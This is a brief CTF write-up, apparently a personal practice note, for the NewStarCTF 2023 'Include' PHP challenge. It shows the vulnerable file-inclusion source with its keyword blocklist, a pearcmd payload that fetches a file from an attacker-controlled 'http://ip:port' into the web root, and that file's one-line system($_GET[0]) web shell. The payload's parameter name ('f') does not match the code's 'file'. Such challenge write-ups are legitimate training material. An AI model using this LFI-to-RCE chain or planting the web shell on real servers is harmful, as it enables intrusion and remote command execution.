Home 刷题笔记

# [NewStarCTF 2023 公开赛道] Include 🍐

<?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
    }
?>

paylaod:

?f=pearcmd&+install+-R+/var/www/html+http://ip:port/eval.php

image-20250223192533238

image-20250223192547479

eval.php:

<?php 
echo '<?php system($_GET[0]);';